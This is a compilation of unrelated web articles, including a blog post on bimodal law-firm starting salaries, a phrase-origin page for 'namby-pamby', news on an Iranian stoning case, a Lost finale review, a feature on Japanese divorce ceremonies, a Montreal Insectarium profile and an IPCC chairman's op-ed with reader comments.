In my working paper , " Are We Selling Results or Résumés ? : The Underexplored Linkage Between Human Resource Systems and Firm - Specific Capital , " I posit that the runaway $ 160 K mode is a confluence of two factors : ( 1 ) the continued growth in the corporate legal services market , primarily due to the growing scale and scope of transnational corporate activity ; and ( 2 ) law firms ' nearly universal adherence to the " Cravath system , " which purports to hire the best graduates from the best law schools and provide them with the best training .
More after the jump .
...
At the height of the Internet boom , a remarkable 14 % of all entry level lawyers took jobs at the $ 125 K level .
According to NALP , " never before had a single salary so dominated the landscape . "
Under the 2006 bimodal distribution ( see chart above ) , 44 % of graduates received entry - level salaries in the $ 40 K to $ 60 K range ; yet , the second mode moved further to the right ( $ 135 K to $ 145 K ) and grew to 17 % of all graduates .
What are the market forces that have created this peculiar salary structure ?
In my working paper , " Are We Selling Results or Résumés ? : The Underexplored Linkage Between Human Resource Systems and Firm - Specific Capital , " I posit that the runaway $ 160 K mode is a confluence of two factors : ( 1 ) the continued growth in the corporate legal services market , primarily due to the growing scale and scope of transnational corporate activity ; and ( 2 ) law firms ' nearly universal adherence to the " Cravath system , " which purports to hire the best graduates from the best law schools and provide them with the best training .
More after the jump .
...
The rightward skew is a bit more pronounced and the area under the $ 75 K to $ 85 K range is becoming more substantial .
A more seismic shift is seen in 2000 ( below ) with the emergence of a second mode at the $ 125 K price point .
NALP recently dug into its archives to determine whether this stratification is a persistent feature of the entry level law market .
See NALP Bulletin ( Jan. 2008 ) .
It turns out that 15 years ago , the market followed a much more traditional distribution .
The chart below summarizes the salaries for the class of 1991 .
The bi-modal distribution ( graphic to the right ) continues to generate interest in the blogosphere .
See , e.g. , Greg Mankiw , Right Coast , Broken Symmetry .
The chart summarizes the starting salaries for lawyers who graduated from law school in 2006 .
One reason the bi-modal structure is so jarring is that it demonstrates that measures of central tendency , such as average or median , are not necessarily reliable guides for law students ' future earning power .
In conventional labor markets , that disconnect is rare .
The New York firm of Cravath Swaine & Moore created and refined this system during the early 20th century .
The emphasis on educational credentials was initially an attempt to establish a distinctive brand of legal services that could differentiate the firm from other Wall Street competitors .
Now , ironically , it has become a uniform industry practice utilized by every large law firm that claims to provide first - rate services .
[ Virtually all firms mimic the Cravath system without understanding its logic .
In the paper , I draw upon a unique study of engineers at the renown Bell Labs to suggest that Cravath 's superior client service has less to do with credentials than an organizational structure and ethos that aligns the interests of associates , partners , and clients .
Paul Cravath 's theory is laid out in Robert Swaine 's history of the firm .
I will discuss his profound disconnect in a subsequent post . ]
On one level , law firms ' reluctance to tinker with the Cravath system makes perfect sense -- it has produced large incomes and huge profits margins for decades .
Further , 30 or 40 years ago , the vast majority of firms that would eventually become the Am Law 200 were , in fact , " white shoe " firms within an overwhelmingly regional corporate legal market .
In particular , places like Cleveland , Detroit , Pittsburgh and St. Louis garnered their share of elite law school graduates .
In the early 1960s , sociologist Jack Ladinsky found that 73 % of Detroit lawyers working in law firms ( i.e. , not in solo practice ) went to one of five national schools : Harvard , Yale , Columbia , Chicago , or University of Michigan .
See Ladinsky , Careers of Lawyers , Law Practice , and Legal Institutions , 28 Am. Sociology Rev. 47 , 49 ( 1963 ) .
You can bet this pattern is radically different today .
As these regional law firms morphed into the Am Law 200 , their partners remained psychologically wedded to their own perceptions of eliteness .
In the ensuing salary wars , these firms slavishly paid the prevailing rate rather than signaling to the market that the firm had become " second rate " ( a term used by a Proskauer Rose partner in rationalizing the higher pay ) .
In turn , the laws of supply and demand produced the bi-modal distribution .
The Results or Résumés paper draws upon two pieces of market data to demonstrate that a large proportion of large corporate law firms have to re-evaluate their business models : ( 1 ) stunning uniformity of associate entry level salaries amidst large , growing disparities in profits per partner ; and ( 2 ) evidence that firms are becoming stratified by premium versus non-premium practice areas .
Regarding the disconnect between associate and partner pay , the bar chart below compares associate starting salaries with profits per equity partner at the 25th , 50th , 75th , and 95th percentile breakpoints in the Am Law 200 .
As the paper documents , over the last several years , profits are going up at all levels of the Am Law 200 ; they are just going up much faster for high PPP firms .
Obviously , when firms at the top of the heap ( 95th percentile ) pay higher salaries and bonuses , it is quite a stretch for firms at the 25th percentile to match .
The money has to come from somewhere .
If it comes out of the draw of a rainmaking partner , he or she has a strong incentive to seek greener pastures .
That is risky ; but to the majority of the partnership , departing from the Cravath model seems equally perilous .
Over the last decade , virtually all large firms have adapted by increasing leverage ( i.e. , the ratio of total lawyers to equity partners ) .
But higher leverage can also undercut associate morale and loyalty .
So for firms at the bottom of the PPP distribution , the salary wars are one hell of a vise , particularly as the economy heads south and they are stuck with a $ 160,000 + cost structure .
Yet , for many firms , there is second trend that is much more troubling .
Based on a dataset of lateral partner mobility within the Am Law 2000 , it is possible to tease out a relative hierarchy of practice areas .
The table below , which covers the 2000 to 2005 time period , orders legal specialty by differential profits per equity partner ( PPP ) between the firm a partner left and the firm he or she joined .
The trends are straightforward .
Partners in marquee practices like white collar crime , securities enforcement , M&A , private equity , emerging markets , and intellectual property litigation are disproportionately moving upstream to more profitable firms .
Partners specializing in regulatory compliance , real estate , public finance , project finance , and trust & estates are disproportionately moving downstream .
A similar analysis using multivariate regression , which controlled for year and city , found that labor & employment was also associated with downward ( i.e. , lower PPP ) movement .
( See regression table . )
In the long - run , firms without a optimal mix of premium practice areas will have a hard time sticking with the Cravath system .
Increasingly , corporate clients are refusing to have their cases staffed by expensive first - or second - year associates who do n't know very much and tend to leave .
Hence , the training the clients are allegedly paying for has little or no future payoff .
In other words , for many large law firms , the wheels of their hallowed business model are falling off .
During this period of denial , every firm 's short term strategy is to work harder , promote fewer lawyers to equity partner , and de-equitize as needed .
Marc Galanter and I chronicle the unremitting nature of modern large firm practice in our forthcoming Elastic Tournament article .
If you have any doubt about the inevitability of change , read this seminal speech by Cisco GC Mark Chandler .
Fortunately , the Results or Résumés paper lays out a solution for any law firm willing to try something new .
The psychological barriers , however , are much larger than the logistical or financial .
I will blog on this topic in a subsequent post .
Namby - pamby
People 's names
Other phrases about :
What 's the meaning of the phrase ' Namby - pamby ' ?
Childish and weakly sentimental .
What 's the origin of the phrase ' Namby - pamby ' ?
The phrase ' namby - pamby ' was a nickname given to the English poet and playwright , Ambrose Philips ( 1674 - 1749 ) .
In 1714 , Philips became tutor to George I 's grandchildren .
The position gave him a status amongst the aristocracy and he took the opportunity to advance his place in society by writing sycophantic sentimental poems in praise of their children .
These were written in rather affected and insipid nursery language , of the ' eency - weency ' , ' goody - goody ' sort .
This did n't go down well with his rival poets and playwrights and when , in 1725 , he wrote the execrable ' To the Honourable Miss Carteret ' , he was widely derided :
Thou , thy parents pride and care ,
Fairest offspring of the fair
...
When again the lambkins play ,
Pretty sportlings , full of May
and so on ...
His contemporaries Henry Carey , John Gay , Alexander Pope and Jonathan Swift combined the cloying nursery reduplication in Philips ' work with his first name and came up with a nickname for him - Namby - Pamby .
Carey was the first to put it into print , in the poem Namby - Pamby , circa 1725 :
All ye poets of the age ,
All ye witlings of the stage …
Namby - Pamby is your guide ,
Albion 's joy , Hibernia 's pride .
Namby - Pamby , pilly - piss ,
Rhimy - pim'd on Missy Miss
Tartaretta Tartaree
From the navel to the knee ;
That her father 's gracy grace
Might give him a placy place .
Pope subsequently made similar fun of Philips in his poem The Dunciad - " Beneath his reign , shall ... Namby Pamby be prefer 'd for Wit ! "
The term began to be used to describe a style of ineffectual writing soon afterwards ; for example , William Ayre , in his Memoirs of the life and writings of Alexander Pope , 1745 , writes :
" He [ Philips ] us'd to write Verses on Infants , in a strange Stile , which Dean [ Jonathan ] Swift calls the Namby Pamby Stile . "
It was n't long before the direct insult to Philips became a new form of general disparagement and ' namby - pamby ' entered the language to refer to anything weak or ineffectual ; for example , The Westmoreland Magazine , 1774 , refers to " A namby - pamby Duke " .
Philips was n't amongst the first rank of English poets , but some believe the fact that his only lasting contribution to the language as the butt of the disparaging ' namby - pamby ' is rather unfair .
He was socially unpopular and remained unmarried , poignantly referring in print to ' a broken love - promise ' , and his unattractive appearance ( " of lean make and pale complexion and five feet seven inches high " - Joseph Spence ) made him an easy target .
However , no less a champion than Samuel Johnson came to his rescue in asserting that " Philips became ridiculous , without his own fault " .
Perhaps a kinder epitaph is that ' namby - pamby ' was clearly the inspiration for the name of the children 's television character , Andy Pandy .
The puppet was featured in the classic series Watch With Mother , which was amongst the first television programmes made for children and a mainstay of BBC output in the 1950s .
See other reduplicated phrases .
A lawyer and activist close to the case of an Iranian woman convicted of adultery say she may soon be stoned to death , RFE / RL's Radio Farda reports .
Women 's rights activist Soheila Vahdati spoke to Radio Farda on June 17 about the case of Sakineh Mohammadi Ashtiani .
Ashtiani , who has two children , has been imprisoned in the northwestern Iranian city of Tabriz since 2005 .
Vahdati says Sakineh was earlier sentenced to 99 lashes in 2006 for having " illicit relationships . "
The sentence was subsequently carried out and her case was closed .
But authorities later charged Ashtiani with murder .
Prosecutors alleged that Ashtiani and her boyfriend had killed her husband .
In making the murder case against Ashtiani , activist Vahdati says the court " illegally " reopened the adultery case against Ashtiani .
It was the second time Ashtiani would be tried for the same alleged adulterous conduct .
According to Vahdati , Ashtiani was sentenced to be stoned to death for the same alleged act of adultery for which she earlier had been convicted to 99 lashes .
It is not clear when she was sentenced .
While denying the charges against her , Ashtiani has asked the authorities for a pardon .
According to activist Vahdati , Ashtiani told the authorities , " if I have done any wrong , I repent . "
Her clemency request was rejected .
Lawyer Mohammad Mostafaie , who represents Ashtiani , also maintains her innocence .
Writing on his personal blog , the lawyer described Ashtiani 's stoning as imminent and said his client will be executed " for an offense she has not committed . "
According to Article 83 of the Laws of Islamic Punishment in Iran , ratified in 1991 , the penalty for adultery is death by stoning .
However , murder is not punishable in Iran by stoning .
Murderers who receive the death sentence are hanged .
Welcome to a blog about nothing more than a bit of code , a little tech , occasional ranting , a little raving .
The Canadian Raptor Conservancy is a 20 + year old organization that provides education about Canada ’s various species of birds of prey .
Through entertaining and informative live shows , we ignite the imaginations of spectators and engage students to find an interest in the magnificence of birds , and the wonders of nature .
This was the cockpit of Bill Caswell 's $ 500 Craigslist rally car yesterday morning .
After nearly killing himself in Mexico , Caswell decided , apropos of nothing , to enter the Pikes Peak International Hillclimb .
Godspeed , Billy boy !
Do n't fall off the hill !
Advertisement
There 's more Bill Caswell to come this week , including an update on his travels ( talks with Hollywood producers !
Shot down by BMW of North America !
Sponsorship deals ! ) and the long - awaited reveal of the Design a T - Shirt , Get a Ride in a Rally Car contest winner .
For now , you can follow his antics , including the Pike 's Peak trip , on Facebook .
Go get 'em , Bill !
Advertisement
[ Facebook ]
Sarah Palin Goes To Knoxville Court To Continue Destroying 22 - Year - Old Who Found Her Yahoo !
Password Two Years Ago
At 0500 BST , about 30 seconds after an on - screen message saying UK viewers were watching Lost : Live from the US - its first and last simultaneous UK / US broadcast - another screen popped up reading Temporary Fault .
Oops .
Luckily the message lasted only a few seconds before normal service was resumed , and so began one of the most anticipated television finales in recent history .
Anticipated because in the six years since Lost began , it has had the power to enthral and infuriate in equal measure .
It launched with what is still the most expensive pilot episode in TV history .
The initial concept was pretty simple - a plane crashed on a mysterious island and the survivors soon found themselves locked in a constant battle against The Others - a hostile group of island residents and some kind of monster that lived in the bushes .
In series two , we found out that people had been on the island for some time and we learned all about the Dharma initiative .
All good so far but then the series seemed to lose its way when it started flashing forward to a future with a dead John Locke , a bitter drug - addicted Jack and the rest of the Oceanic Six living out their " normal " lives .
The island began time - travelling , half the the gang ended up living as part of the Dharma initiative in 1973 , we were introduced to the island 's almost mythical protector Jacob as he met the so - called " candidates " at points throughout their lives , then there was the return to the island , the Man In Black ...
The show had become so complex that any rational explanation to the question : " What is it all about ? " was always going to be a tough one .
The cynics questioned whether writers and head honchos Damon Lindelof and Carlton Cuse had any idea where it was all heading .
So , the final episode .
The finish line .
The finale .
The end .
Was it all worth it ?
Life affirming
Honestly , the show ended the only way it could have possibly ended .
It was emotionally satisfying while some of the questions were answered and yet others will remain a mystery .
All in all , the show was wrapped up rather nicely with a positive affirming kind of message .
It all began with Flocke ( as in Fake Locke , or the Man In Black ) having vowed to destroy the island with the help of Desmond , taking him to the island 's life source .
Jack , having volunteered to be Jacob 's replacement on the island , had the same idea , but rather than using Desmond to destroy the island , he had vowed to kill Flocke .
Image caption
The fates of the survivors were revealed
Desmond did not end up destroying the island .
He came very close but by unplugging the island 's light source , he succeeded in making Flocke human , thus allowing Kate to kill him with a shot to the back .
Was this a bit of a disappointing end to the Man In Black , the chief antagonist of the last season ?
Possibly , and a slightly unfair one as well .
The Man In Black ( he never even got a name ) certainly got a bit of a raw deal when goody - two shoes Jacob threw him into the light source some two thousand years earlier , robbing him both of his body and his humanity .
Was he all bad ?
He certainly was a bit of a trouble - maker who carried out a few terrible deeds .
But in the Across the Sea episode of season six - we saw a man who saw the limitations of his life on island and saw his destiny elsewhere .
By killing him , there , was no chance of his redemption .
Also , surely killing him resulted in a loss of balance on the island .
All of Lost 's imagery pointed to good and bad co-existing , the black and white stones , the struggle between light and dark .
In the struggle that preceded the fatal shooting , Jack was mortally wounded and resolved to stay and repair the island .
Hurley went with him and Jack made him his successor as island protector .
Meanwhile , Sawyer , Kate , Claire , Miles , Richard and Lapidis managed to get the plane working with the help of some duct tape and flew off the island to safety .
Meanwhile , the flashes sideways continued as the survivors were all drawn together at the music concert at the Widmores .
Locke had accepted Jack 's offer of surgery and was now capable of walking unaided .
Hurley took Sayid to a bar where - after stopping a fight - he was reunited with Shannon .
Sun and Jin were reminded of their time on the island as they saw the ultrasound of their baby and Sawyer and Juliet met again in a touching scene by a snack machine .
Flashes explained
As early as the first season , there were suggestions that no - one survived the plane crash and the island was some sort of purgatory .
Close but no cigar .
The island was real and as Jack 's dad Christian Shephard ( ... Kate was the one that spotted it .
Really how did we all miss that one ? ) pointed out " everything that happened , happened " .
Instead , we learned that rather than being some some kind of alternate - timeline , the flashes sideways were glimpses of a kind of limbo between life and death .
In their deaths - some on the island , some much , much later - they were all pulled together to move on to the afterlife .
The people that meant most to them during their lives would be there with them as they moved on to the next plane of existence .
With various philosophies running throughout the entire series , the final scenes took place in a multi-denominational place of worship .
There were some genuinely moving touches , Ben remained outside the gathering , not quite ready to leave his own personal purgatory and forgive himself for his sins .
Yet Locke did offer him gratefully accepted forgiveness and Hurley , who invited Ben into the gathering said he was a " good number two " , with Ben telling Hurley he was a " great number one " .
We were left to assume that the two men acted as protectors of the island for some time .
It ended as it had begun with Jack lying in the same bamboo forest in which we first met him in episode one .
Back then Jack opened his eyes for the first time on the island , this time around he closed them for the last .
Yes , the finale could be accused of being a bit melodramatic and certainly there were many issues left unaddressed .
Whatever happened to Michael and Walt ?
What was the significance of the Egyptian statue on the island ?
What about the temple ?
Why , at the beginning of this series , was the island underwater ?
Discussions will likely rage for years to come but if there is any lesson from the final episode , then it is that sometimes you just have to let go .
NEW DELHI 
The contrast between the disasters , more than a quarter - century and half a world apart , could not be starker .
In 1984 , a leak of toxic gas at an American company ’s Indian subsidiary killed thousands , injured tens of thousands more and left a major city with a toxic waste dump at its heart .
The company walked away after paying a $ 470 million settlement .
The company ’s American chief executive , arrested while in India , skipped bail , never to return .
This month eight former senior officials from the company , including one who has since died , were convicted of negligence , but the sentence  two years in jail  seems paltry to many here compared to the impact of their crime .
No matter how halting the Obama administration ’s response to the gushing oil spill in the Gulf of Mexico might look to Americans , Indians cannot help but marvel  and envy  the alacrity with which the United States government has acted .
BP ’s $ 20 billion cleanup fund , as vast a sum as it seems from here , is in all likelihood merely a down payment on what the company will probably pay for the damage caused by the oil spill in the Gulf of Mexico .
A criminal investigation has begun .
And while the environmental toll is huge , the cost in human lives , compared with Bhopal , has been minimal .
When Hiroki Terai was a child he once asked his parents why there was no such thing as a divorce ceremony and they laughed at him .
Now , as Japan ’s first professional “ charisma divorce planner , ” he watches with satisfaction as soon - to - be - former couples join hands on a mallet and smash rings , beginning new , separate lives .
Last March , a friend of Terai ’s from college , on the verge of his own divorce , echoed that life - long question .
“ Japanese culture celebrates both beginnings and endings , ” he said .
“ Why is only the beginning of a marriage marked ? ” A month later , Terai held his first divorce ceremony for that friend at a restaurant in Shinjuku .
Word got out , and it struck a chord .
Requests started coming in .
After performing a few more on his own , he teamed up with day - trip specialists Friendly Travel to run the ceremonies as a half - day package tour for ¥ 3,000 per person .
The parting couple meets near Sensoji Temple in Asakusa and rides in separate rickshaws with friends and relatives following on foot to a “ Divorce Mansion , ” a doppelganger of Japan ’s ubiquitous wedding halls .
There , they stand before their guests and listen as Terai recounts the circumstances leading up to the decision to separate ( they ’ve briefed him in individual meetings beforehand ) .
He says that although one side , usually the wife , will often demand a blunt statement about exactly what went wrong , he opts for tact .
“ I wo n’t just come out and say ‘ he cheated , ' ” Terai says .
“ I ’ll say something indirect that gets the message across .
And I always add that ‘ there are surely circumstances known only to the two people involved . '”
The guests of honor each make speeches , and then , as at a Japanese wedding party , one person is chosen to speak on behalf of the assembled friends , preferably someone who has been divorced .
This speech almost always starts with “ Rikon omedeto gozaimasu ” ( congratulations on your divorce ) .
The friend emphasizes that divorce is another kind of beginning , and that friends will continue to be there .
Up until this point , there ’s “ a strange sort of vibe , ” Terai says .
“ People do n’t know how to respond , whether they should clap or stay quiet . ”
Then comes the key moment : the smashing of the rings .
“ I based it on the image of the cake cutting . ”
In their “ final joint act , ” the two each put one hand on a mallet .
In a light - hearted stroke of symbolism , the mallet has a frog on it to represent the couple “ changing ” into singles .
( The words for “ frog ” and “ change ” are homonyms in Japanese . )
After the smashing of the rings , Terai says the mood changes as well .
The audience applauds spontaneously , and looks of relief and happiness come over the couple .
Staying with the kaeru theme , the Divorce Mansion ’s mascot is a friendly looking pink frog statue Terai had made to order .
The battered rings are dropped into the frog ’s mouth and left there .
Although the statue seems to be giving the peace sign , it ’s actually flashing a warning of sorts :
Terai said the gesture reflects the fact that , with the most recent stats at 250,000 divorces a year , “ two out of six couples in Japan get divorced . ”
The frog may be cartoonish , but the ceremonies are absolutely no joke .
“ Once a couple has decided to break up , I ’d like to see them make a clean , clear break that lets them both move forward , ” Terai says .
“ The message is really powerful . ”
The reaction has been serious , too .
Terai says he ’s gotten about a hundred inquiries from people across Japan who say they would like to start similar services .
And although he ’s ushered only 23 couples to singledom , he says he ’s gotten hundreds more requests for ceremonies that did n’t reach the final stages of planning because – surprise – the couples would n’t work on it together .
Although the divorce rate in Japan has been on a gentle decline since peaking in 2002 , you would n’t know it from its appearance lately in the news and pop culture .
Attention has been drawn to divorce both by high - profile international child custody cases and lurid stories of wakaresaseya , the shady business of hiring an actor who serves as both temptation and private eye to ( among other things ) break up marriages .
NHK , following up last year ’s comedy - drama “ Konkatsu Rikatsu ” ( Marriage Seeking , Divorce Seeking ) , is now running a five - part drama called “ Rikon Dokyo ” ( Divorce Cohabitation ) based on a popular manga of the same name by Cocco Kashiwaya .
The story is about a divorced couple with a young daughter who split up after eight years of marriage and then move back in together for financial reasons .
Smell the potential for a happy ending ?
So does Terai , at least once in a while .
Two of his ceremonies have ended up with the couples deciding to stay together .
One man and woman , both in their fifties , reached the end of the ceremony and then decided to reconsider after they missed the rings with three blows in a row .
Not so fast with the hearts and doves , though .
Since he started being profiled in the Japanese and Korean media in the last year , Terai has had over 800 total inquiries .
With bookings through the middle of July , we do n’t think he ’ll be out of work any time soon .
The travel agent , Friendly Travel , has a page in Japanese with all the details .
Sex shop Christian Love Toys is , of course , for marital bliss only , but what if a married couple finds its bliss is porn ?
Then they 're politely , if judgmentally , asked to leave .
Maybe try secular sex stores , which " sell a plethora of pornographic and inappropriate products .
Inappropriate like anal beads marketed as " feather ticklers " ?
Nope .
Those are allowed .
In a section labeled " Porn Addicts , " it tells users " Pornography isolates you from the world , friends , family , God , and plunges you in a gluttonous fantasy world .
It adversely affects ALL of your relationships . "
It recommends users seek redemption at the XXX Church , a site that aims to end porn and sex addictions by " purifying " the mind , much like the Dirty Girls Ministries we talked about yesterday .
I do n't know what I was expecting !
As the Guardian points out , Christian sex shops are a step in the right direction .
But does n't adding judgment to a place that 's supposed to be a comfortable place to shop only undermine it ?
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement By Brandy Yanchyk
Montreal
Georges Brossard has spent the last 35 years in passionate pursuit of insects - sleeping among them and even eating the odd cricket or ant .
The dedicated collector spends six months a year travelling the globe collecting specimens for " insect museums " known as insectariums , which he has helped set up around the world .
The Montreal Insectarium , which opened 20 years ago , was Georges Brossard 's idea .
He donated 250,000 insects from his collection to get it started .
Sometimes it was tiny portions but other times it was big scorpions seasoned with Asian spice
Francois Ouellet
Montreal Insectarium Today it is the largest insectarium in North America and among the largest in the world , attracting more than 350,000 visitors each year .
Visitors come to see the live and dead bugs on display .
These include mounted insect collections of more than 145,000 specimens and a live collection of over 100 species of arthropods .
But it is more than the collections of live and dead insects that has been attracting visitors .
The annual insect tastings , where professional chefs cook up bugs for thousands of visitors to taste , are an added attraction .
Cheese - flavoured crickets " Sometimes it was tiny portions , but other times it was big scorpions seasoned with Asian spice , " says Francois Ouellet of the Montreal Botanical Garden and Insectarium .
" For some people it was just too much to taste bigger , larger insects .
For others it was maybe an experience to face a fear , and then once it 's done the fear is gone .
You were not harmed and it tasted good . "
When there are no insect exhibitions , visitors can taste bugs at the Insectarium 's boutique , where they sell boxes of barbecue , salt - and - vinegar , or cheese and bacon - flavoured mealworms and crickets .
They also sell lollipops that contain worms .
In fact , the Insectarium breeds its own mealworms and crickets for this very purpose .
People use the cooked insects on top of salads , instead of using bacon bits
Enza Cacciatore
Insectarium boutique " These here are especially grown at the Insectarium for us to sell , " says Enza Cacciatore from the insectarium 's boutique .
" So we try to explain to the little ones that they are not to start to pick up the bugs from off the floor and eat them because they are not the same kind of bugs . "
Ms Cacciatore says it is mostly children and teenagers who buy insects .
But she thinks more people should consider buying them because they are " very good for you , have good proteins , are zero fat and are perfect for snacking " .
She continued : " People use the cooked insects on top of salads , instead of using bacon bits .
Sure , they wo n't be using it every night , because it 's C$ 4.50 ( £ 2.90 ) a box .
But if they have parties it 's a talking starter for a good party . "
Not for the squeamish : visitors are encouraged to tuck in Mr Brossard also agrees with the Insectarium that dispelling myths about insects is important .
But it goes further than that for the entomologist : he believes humans can learn a lot from the way insects live their lives .
" Insects have found a way of life which humans have not done yet , " says Mr. Brossard .
" There 's war this morning , there 's problems all over the planet , and insects have no problems .
" They know how to utilise life , nature , and they render it to their successors , which is not the case for humans .
We 're going to leave in a state that 's totally spoiled . "
Hollywood butterflies Mr Brossard has been teaching the world about bugs through the " Insectia " television series he presented , which was broadcast in 150 countries around the world .
Georges Brossard gets up close with one of his furry friends " The Blue Butterfly " starring William Hurt from 2004 was also based on an episode from Mr Brossard 's life .
The film was about a young boy with terminal cancer , who asked the collector if he could help him catch a rare blue butterfly before he died .
" I took him to Mexico , because it 's the closest place where the blue butterfly flies , " says Mr Brossard .
" He caught his blue butterfly ... Today he is 27 years old .
You see , 20 years after he is still alive .
People say it 's a miracle . "
Mr Brossard continues to travel the world collecting insects for his insectariums and says he " will keep going till the end " .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
VIEWPOINT
Dr R K Pachauri
As the latest meeting of the InterAcademy Council 's review into the Intergovernmental Panel on Climate Change convenes in Montreal , IPCC chairman R K Pachauri says the past year has been " momentous " for the organisation , and not always for the right reasons .
In this week 's Green Room , he sets out how and why the panel was established , and argues that it plays a vital role in the global climate policy debate .
Contrary to allegations made by some of our wilder critics , there is no role - and no desire - for an executive function making decisions of its own
IPCC chief defends climate body I would like to start by saying that I am not deaf to those who do not agree with the scientific consensus on man-made climate change .
Nor , indeed , to those who do not agree with the findings - or , in some cases , the existence - of the IPCC .
Such scepticism is inevitable , and has been the case with every area of new knowledge that has burst into human consciousness .
We who are on the side of the consensus must remind ourselves that the evolution of knowledge thrives on debate .
The last year has been a momentous one indeed for the IPCC and climate science , and not always for the most welcome of reasons .
The discovery of a mistake in our AR4 report - even as we prepared to start work on AR5 - led to considerable controversy .
It was , and is , inevitable that such an incident would lead to criticism and - quite rightly - to both internal and external examination .
However , at times in the last six months it has become apparent that many people either do not know , or have forgotten , what the IPCC actually is : what it was formed to do , who it reports to , and what its current mandate is .
Without that starting point - of understanding based in current and historical knowledge - there is a danger that the wrong conclusions can be drawn about the organisation 's future .
Shared responsibility The Intergovernmental Panel on Climate Change ( IPCC ) was established in 1988 through the mandate of the UN General Assembly .
UN chief Ban Ki-moon called for experts to review the IPCC 's work
Scientists to review climate body
It is not - and it is important to remember this - a UN body but , as its title suggests , an intergovernmental organisation , which means that ultimately its decisions have to be taken by the panel as a whole ( ie all the governments of the world ) .
Contrary to allegations made by some of our wilder critics , there is no role - and no desire - for an executive function making decisions of its own .
It is also worth noting that most of the IPCC 's more public figures - myself included - are not paid for our work .
Only our small secretariat in Geneva is paid - and the total budget for our organisation , which is responsible for co-ordinating the work of several thousand scientists around the world , is just £ 6 m a year : hardly the giant , monolithic bureaucracy that some of our critics claim .
Another myth is that the IPCC was founded as a climates science organisation alone , publishing up - to - date science on the subject and nothing more .
Quite the contrary : going back to the IPCC 's foundation , it is pertinent to observe that resolution A / RES / 43/53 of the UN General Assembly , which was adopted on December 6 , 1988 , charged the IPCC to : " provide internationally co-ordinated scientific assessments of the magnitude , timing and potential environmental and socio- economic impact of climate change and realistic response strategies " .
The IPCC and the scientific community at large should welcome the development of a vigorous debate on the science of climate change
The wording of this resolution is important .
It clearly requires the IPCC to go beyond merely assessing various aspects of climate change and mandates it to provide an assessment of " realistic response strategies " , as well as addressing socio-economic concerns .
The same resolution also defines by implication the audience that should be addressed by the IPCC by calling upon " non-governmental organisations , industry and other productive sectors to play their due role " .
So , right from its foundation the strength of the IPCC lay in the fact that it is not only able to mobilise the best available expertise from across the globe - in climate science , yes , but also in economics , business , engineering and so on - but , through its voting structure , it also ensures that all the assessment reports are " owned " by the 194 sponsoring governments around the world .
Under the microscope Notwithstanding my observation that the IPCC has always been charged with delivering more than climate science expertise alone , it is true to say its role in informing decision - makers across the globe has evolved rapidly over the past two decades .
As someone who has long been involved in the IPCC - first as a lead author in the Second Assessment Report and then as vice chairman during the Third Assessment Report and finally as chairman since 2002 - I have seen the rapid spread of its findings .
The IPCC admits just one error , on the melting date of Himalayan glaciers
As the scope of those findings has increased - to address its broader mandate outlined above - it is inevitable that everything that the IPCC does is now under the lens of public scrutiny and criticism .
This requires the Panel to ensure a high level of transparency and objectivity in all that it does .
All the IPCC 's reports are subject to open , extensive and transparent review at every stage of drafting .
What do I mean by that ?
Well , the IPCC bases its work on the most recent relevant sources of literature available worldwide and undertakes a two - stage review process - first by external experts , and then by governments and experts simultaneously .
The results of these processes are then made available to anyone who wants to see them .
Most of the literature we assess is peer - reviewed .
However , there are areas such as the ones related to response measures where lots of important and relevant information is not in scientific peer - reviewed literature , but published by very respected institutions , for example from the International Energy Agency or the OECD .
' Wonderful organisation '
The IPCC is now working on the preparation of the Fifth Assessment Report ( AR5 ) .
This has begun on a positive and heartening note : in spite of all the attacks on climate scientists over the last year , around 3,000 outstanding scientists from all over the world have been nominated , more than ever before .
Some sceptics want to end the " myth " of dangerous climate change
Sceptics rally to expose ' myth '
From these , around 600 are under selection to become the actual authors of the AR5 , and several more as contributing authors and expert reviewers .
Meanwhile , as the process of author selection continues , we continue to look at improving our work in any way we can .
Earlier this year , we at the IPCC , together with the secretary - general of the United Nations , requested the InterAcademy Council to review the processes and procedures followed by the IPCC .
This review is currently in hand , and its outputs will be considered seriously at our plenary session in October .
The AR5 will , therefore , not only build on the remarkable record of the IPCC in the 22 years of its existence but also benefit from the views of the most dominant scientific body in the world , the InterAcademy Council , which can only add further authority to the output of the Panel .
The IPCC and the scientific community at large should welcome the development of a vigorous debate on the science of climate change ( so long as the level of that debate does not descend to personal abuse , as it has done at times ) .
But welcoming a debate should never equate to losing our focus and our passion for fulfilling our purpose .
For that purpose is more relevant now than it ever has been : given the extent and global nature of the challenge , if the IPCC did not already exist , someone would need to invent it urgently .
It is that sense of urgency and necessity that drives the volunteer spirit of this wonderful organisation I have the honour to chair - a spirit that we can all be proud of .
Dr R K Pachauri is chairman of the Intergovernmental Panel on Climate Change The Green Room is a series of opinion articles on environmental topics running weekly on the BBC News website Do you agree with Dr Pachauri ?
Does the IPCC play a vital role in the global climate policy issue ?
If the panel did not exist , what - if anything - should be in its place ?
We can have a debate over the word concensus related to the science BUT unless there is a political concensus then the human response will likely be too little too late .
Whatever the arguments the IPCC does focus the debate that needs to take place and indeed is taking place .
However if the mandate is as wide as suggested then the IPCC should begin to focus more on the response than the cause because hardly anyone seems to argue that the warming is real anymore .
But the attitude of many seems to be ' if we did n't cause it then there is nothing we can do so let us get on with our lives '
This ignores a host of huge economic forces in play , both positive and negative , and these economic issues are not getting the same exposure as the climate science .
Many industries like oil are happier ( in the short term ) to continue undisturbed scraping every last drop of oil from more and more difficult terrain ( 2010 the Gulf ...2020 the Artic ? ) .
But the fact is even the oil industry recognises that the oil is running out and the easy to get at oil has clearly run out .
Some would clearly like to delay the inevitable transformation of the energy industry for as long as possible .
The conumdrum we must solve is the age old response - ' pain tomorrow is less painful than pain today ' or ' never do today what you can put off until tomorrow ' .
This has been the road to many previous , if potentially smaller , human disasters and it is the root cause of most of the negative side of the climate change debate .
Denison Chapman , Rotterdam , Netherlands 22 years on and the IPCC still has n't produced any " realistic response strategies " , it 's the Ofsted of the scientific world , an organisation that is disbanded if it succeeds , given objectives for which there are no solutions .
I have never met , or spoken to a sceptic who did n't know what the IPCC was trying to do , it 's obvious what it 's trying to do it 's trying to mitigate global warming , that 's it 's objective .
So it started out life with the problem defined , which meant that the raison d'etre for WG1 was to prove this assumption else there would be no need for WG2 and WG3 , or the IPCC for that matter .
